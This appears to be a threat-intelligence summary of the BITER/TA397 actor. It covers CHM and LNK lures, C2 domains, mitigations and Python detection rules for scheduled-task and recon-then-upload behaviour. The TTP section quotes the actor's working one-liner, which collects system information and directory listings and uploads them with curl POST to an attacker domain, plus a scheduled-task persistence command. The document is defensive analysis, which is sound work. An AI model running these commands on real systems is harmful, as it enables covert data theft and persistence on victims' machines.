How StrikeReady helped a SOC prioritize alerts triggered by a previously untagged APT actor.
Analysis Summary
# Threat Actor: BITER (Attribution Suspected)
## Attribution & Identity
The article directly mentions the threat actor **BITER** in the context of sharing indicators on GitHub. A vendor, Proofpoint, associates related activity with the identifier **TA397**.
## Activity Summary
This summary does not detail specific historical campaigns or large-scale operations by BITER/TA397. It focuses instead on the *methodology* of tracking threats that exhibit suspicious characteristics (non-matching file extensions, specific command-line arguments, or unique bytecode) in order to build a cluster of related samples. The examples provided show samples distributed in February 2024 and relate to document files (CHM, RAR/LNK, PDF), often using lures on professional or governmental topics (e.g., `Crime_record_nov_2023.chm`, `Abroad_Training_Nominations_Jan_2024.rar`).
## Tactics, Techniques & Procedures
The article focuses on behavioral pivoting rather than specific, generalized APT TTPs. Specific behaviors observed in clustered samples include:
- Creating scheduled tasks for persistence: `schtasks /create /tn DriverUpdates /f /sc minute /mo 15 /tr [payload]`
- Information gathering and exfiltration executed via `curl`: `systeminfo > C:\Users\Public\Music\desk.txt & tasklist >> C:\Users\Public\Music\desk.txt & dir "C:\Users\%USERNAME%\Desktop" >> C:\Users\Public\Music\desk.txt & dir "C:\Users\%USERNAME%\Downloads" >> C:\Users\Public\Music\desk.txt & dir "C:\Users\%USERNAME%\Documents" >> C:\Users\Public\Music\desk.txt & curl -X POST -F "file=@C:\Users\Public\Music\desk.txt" commonlifesupport[.]com/ssu.php?s=%computername%_%username%`
- Use of unusual file extensions/packaging, specifically distribution via **CHM files** and **`.pdf.lnk`** files often wrapped in `.rar` archives.
- Use of **.NET assembly** payloads (PE32 executable).
- Use of specific IL bytecode patterns (e.g., the function listed in Figure 7).
## Targeting
- Sectors: Not explicitly stated, but lures suggest professional/governmental sectors (e.g., training nominations, official documents).
- Geography: Not explicitly stated, but one sample references Pakistan-China relations.
- Victims: Specific organizations are not named in the summary provided.
## Tools & Infrastructure
- Malware families used:
  - PE32 executable (likely custom/commodity malware executed from LNK/CHM).
  - VBScript payload (`winegt.vbs`).
- Infrastructure (C2, domains, IPs):
  - `isndatumhost[.]com` (used for initial file serving)
  - `kaatmusiclab[.]com` (associated C2)
  - `commonlifesupport[.]com/ssu.php` (used for exfiltration of system information)
  - `adamsresearchshare[.]com/textcmd/cmd1.php` (C2/drop point)
  - `adamsresearchshare[.]com/mack.php` (C2/drop point)
  - `updnangelgroup[.]com/ridge/visors.php`
  - `ellearningstore[.]com/rest/api.php`
  - `wcnsappword[.]com/wmis/wave.php`
## Implications
The activities described highlight the use of social engineering via deceptive document files (CHM, LNK) used to deliver payloads, indicating an active intrusion or initial access campaign. The focus on behavioral signatures (scheduled task arguments, API calls) over simple hashes suggests the actor is frequently modifying file names and hashes to evade signature-based detection, requiring analysts to rely on broader behavioral grouping.
## Mitigations
- Enhance detection for scheduled task creation with unusual frequency or minute-level precision (`/sc minute /mo 15`).
- Monitor for system information gathering commands (`systeminfo`, `tasklist`, `dir`) followed immediately by network utilization (`curl -X POST`).
- Scrutinize the delivery of executable content (.jpg mapped to PE32) and the presence of suspicious archive contents like `.lnk` files within documents or archives like `.rar`.
- Incorporate malware analysis focusing on C# IL bytecode or unique .NET function patterns identified in trusted samples to find related, undetected variants.
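The first two mitigations above, expressed as detection logic over process-creation events. This is an added example, not code from the article or from StrikeReady; the sample events, host names, timestamps, the two-minute correlation window and the `example.invalid` domain are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample process-creation events (timestamp, host, command line).
# The first two mirror the command lines quoted in the TTP section; the rest are benign noise.
SAMPLE_EVENTS = [
    ("2024-02-10T09:00:00", "WS01", 'schtasks /create /tn DriverUpdates /f /sc minute /mo 15 /tr "C:\\Users\\Public\\Music\\winegt.vbs"'),
    ("2024-02-10T09:00:05", "WS01", 'cmd.exe /c systeminfo > C:\\Users\\Public\\Music\\desk.txt & tasklist >> C:\\Users\\Public\\Music\\desk.txt & curl -X POST -F "file=@C:\\Users\\Public\\Music\\desk.txt" example.invalid/ssu.php'),
    ("2024-02-10T09:30:00", "WS02", "systeminfo"),
    ("2024-02-10T09:30:40", "WS02", 'curl -X POST -F "file=@C:\\temp\\out.txt" example.invalid/up.php'),
    ("2024-02-10T10:00:00", "WS03", "schtasks /create /tn Backup /sc daily /st 02:00 /tr backup.exe"),
    ("2024-02-10T11:00:00", "WS03", "curl -X POST -d x=1 example.invalid/api"),
]

# Rule 1: scheduled task created with minute-level repetition (/sc minute), regardless of /mo value.
SCHTASKS_MINUTE = re.compile(r"\bschtasks\b.*\s/create\b.*\s/sc\s+minute\b", re.IGNORECASE)
# Rule 2: host-inventory commands followed by an HTTP POST upload via curl.
RECON = re.compile(r"(?<![\w\\])(systeminfo|tasklist|dir)\b", re.IGNORECASE)
CURL_POST = re.compile(r"\bcurl\b.*\s-X\s+POST\b", re.IGNORECASE)
WINDOW = timedelta(minutes=2)  # assumed correlation window between recon and upload


def detect(events):
    """Return (host, rule, timestamp) alerts for timestamp-ordered events.

    Recon and upload may sit in one chained command line (as in the article's
    sample) or in separate events on the same host within WINDOW.
    """
    alerts = []
    last_recon = {}  # host -> time of the most recent recon command
    for ts_s, host, cmdline in events:
        ts = datetime.fromisoformat(ts_s)
        if SCHTASKS_MINUTE.search(cmdline):
            alerts.append((host, "schtasks_minute_repeat", ts_s))
        if RECON.search(cmdline):
            last_recon[host] = ts
        if CURL_POST.search(cmdline):
            seen = last_recon.get(host)
            if seen is not None and ts - seen <= WINDOW:
                alerts.append((host, "recon_then_curl_post", ts_s))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```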